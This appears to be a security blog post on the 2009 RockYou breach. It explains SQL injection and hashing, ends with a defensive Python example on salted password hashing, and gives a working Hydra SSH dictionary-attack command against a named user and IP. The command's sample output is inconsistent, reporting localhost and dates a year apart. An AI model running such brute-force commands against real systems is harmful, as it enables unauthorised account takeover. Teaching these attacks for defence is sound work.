## The RockYou Breach: A Cautionary Tale

**RockYou**, a popular widget developer for social networks (e.g., Myspace, Facebook), faced a significant breach back in 2009.

How?

- Hackers exploited a decade-old SQL injection flaw.

Result?

- Over **32 million user accounts** exposed.

> [!tip]- SQL Injection
> This vulnerability allows attackers to manipulate SQL queries by injecting malicious code into an application's input fields, granting them unauthorized access to a database. Once inside, attackers can view, modify, or delete data. Essentially, SQL injections trick the system into executing unintended SQL commands. The root cause is often insufficient input validation and application code that directly uses user input in database queries. To prevent SQL injections, it's important that developers use techniques like prepared statements and parameterized queries.

### RockYou's fatal errors

- Poor password policies.
- Storing passwords in plaintext, not hashed.

**32 million** passwords were leaked, **14 million** of which were unique.

> [!tip]- Hashing
> Hashing is the process of converting varied-size input data into a fixed-length string of bytes, known as a "hash." It's essentially a scrambled, irreversible string that's deterministic, meaning the same input always produces the same hash. Hashing is pivotal for data integrity and password storage.

## Implications for Users

If you ever had a basic password, it's likely part of such a list. This is because cracking tools like **Hydra, HashCat, and John the Ripper** exist.

Password cracking tools:

- Handle many hash types.
- Operate at high speeds.
- Are freely accessible.

### Password Cracking Exercise using Hydra

Cracking tools are relatively easy to use.
Below is the syntax to run a Hydra dictionary attack. Hydra supports more than 50 protocols, such as Telnet, FTP, HTTP, HTTPS, SMB, and SSH. Note that `-P` (uppercase) takes a password list file; lowercase `-p` takes a single password:

```
$ hydra -l <username> -P <password-list> <IP> <service>
```

If we knew the IP address and username we wanted to hack over SSH, we could use RockYou's 14 million unique passwords as the password list in a single command:

```
$ hydra -l jdoe -P /usr/share/wordlists/rockyou.txt 147.199.135.221 ssh
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-09-27 13:51:24
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 1 task per 1 server, overall 1 task, 1 login try (1:1/p:1), ~1 try per task
[DATA] attacking ssh://localhost:22/
[22][ssh] host: localhost   login: jdoe   password: Armadillo
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-09-10 13:51:24
```

And just like that, we found that the `jdoe` account's password is `Armadillo`.

#### Are hashed passwords safe from password crackers?

Hashed passwords, while not directly reversible, are still vulnerable. With the right tools and a long list of passwords like RockYou's, hackers can:

1. Determine your password's hashing algorithm.
2. Generate hash values for a vast list of potential passwords.
3. Compare to find a match.

## Shielding Against Threats

To defend against such threats:

1. **Strengthen your passwords**. Read more on enhancing passwords here: [[Your Passwords are Insecure]].
2. **Avoid reusing passwords across platforms**.
3. Use a [**Password Manager**](https://en.wikipedia.org/wiki/Password_manager) to manage complex passwords efficiently.
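The three cracking steps above and the defenses in this section can be seen side by side in a few lines of Python. The following is an added example written for this page, not code from the original post or from any of the tools it names. It uses only the standard library; the six-entry wordlist and the `PBKDF2_ITERATIONS` value are constructed assumptions standing in for rockyou.txt and for a real deployment's tuning, and `password_is_acceptable` is a hypothetical signup check, not a named library function.

```python
"""Added example (not part of the original post): plaintext storage, unsalted
fast hashing, salted slow hashing, and a breached-password check at signup.
Every input below is constructed for illustration."""
import hashlib
import hmac
import secrets
from typing import Dict, List, Optional, Set, Tuple

# Constructed stand-in for a leaked wordlist such as rockyou.txt (not real data).
LEAKED_WORDLIST: List[str] = ["123456", "password", "iloveyou",
                              "princess", "Armadillo", "qwerty"]

# --- 1. Storage the RockYou way: plaintext, nothing to crack ------------------
def store_plaintext(password: str) -> str:
    # What RockYou did: a dump of this column is the credential itself.
    return password

# --- 2. Unsalted fast hash: one precomputed table cracks every account --------
def sha256_unsalted(password: str) -> str:
    return hashlib.sha256(password.encode("utf-8")).hexdigest()

def dictionary_lookup(stored_hash: str, wordlist: List[str]) -> Optional[str]:
    """Steps 2 and 3 from the text: hash every candidate, compare to the stored
    value. Without a salt this table is built once and reused for all users."""
    table: Dict[str, str] = {sha256_unsalted(w): w for w in wordlist}
    return table.get(stored_hash)

# --- 3. Salted, slow hash: PBKDF2-HMAC-SHA256 from the standard library -------
# Assumption: iteration count chosen for this example; real deployments should
# follow current guidance and re-tune as hardware gets faster.
PBKDF2_ITERATIONS = 600_000

def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    """Return a self-describing record: algorithm$iterations$salt$digest.
    A fresh random salt per user defeats precomputed tables; the iteration
    count makes each guess expensive for the attacker and cheap enough for us."""
    salt = salt if salt is not None else secrets.token_bytes(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                 salt, PBKDF2_ITERATIONS)
    return f"pbkdf2_sha256${PBKDF2_ITERATIONS}${salt.hex()}${digest.hex()}"

def verify_password(password: str, stored: str) -> bool:
    algo, iterations, salt_hex, digest_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError(f"unsupported record format: {algo}")
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                 bytes.fromhex(salt_hex), int(iterations))
    # Constant-time comparison so timing does not leak how many bytes matched.
    return hmac.compare_digest(digest, bytes.fromhex(digest_hex))

# --- 4. Policy check at signup: reject short and already-leaked passwords -----
def password_is_acceptable(password: str, breached: Set[str],
                           min_length: int = 12) -> Tuple[bool, str]:
    """Hypothetical signup check: length first, then membership in a breach
    list. The lookup is case-sensitive to match how passwords were leaked."""
    if len(password) < min_length:
        return False, f"shorter than {min_length} characters"
    if password in breached:
        return False, "appears in a known breach list"
    return True, "ok"

if __name__ == "__main__":
    leaked = sha256_unsalted("Armadillo")
    print("unsalted SHA-256 recovered:", dictionary_lookup(leaked, LEAKED_WORDLIST))
    record = hash_password("Armadillo")
    print("salted PBKDF2 record:", record)
    print("verify correct:", verify_password("Armadillo", record))
    print("verify wrong:  ", verify_password("armadillo", record))
    print("signup check:  ", password_is_acceptable("Armadillo", set(LEAKED_WORDLIST)))
```

Two points the run makes visible: hashing `Armadillo` twice with `hash_password` yields two different records (different salts), so the single lookup table that cracks the unsalted column cannot be reused against a salted one, and a per-user guess now costs `PBKDF2_ITERATIONS` HMAC calls instead of one SHA-256. The signup check then stops `Armadillo` before it is ever stored, which is the cheapest defense of all.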
Remember: **Always prioritize password security**. Guard your digital front door with a strong password. Don't hand hackers the key.

---

*Click here to learn more [[About Me]] and nickhacks.com*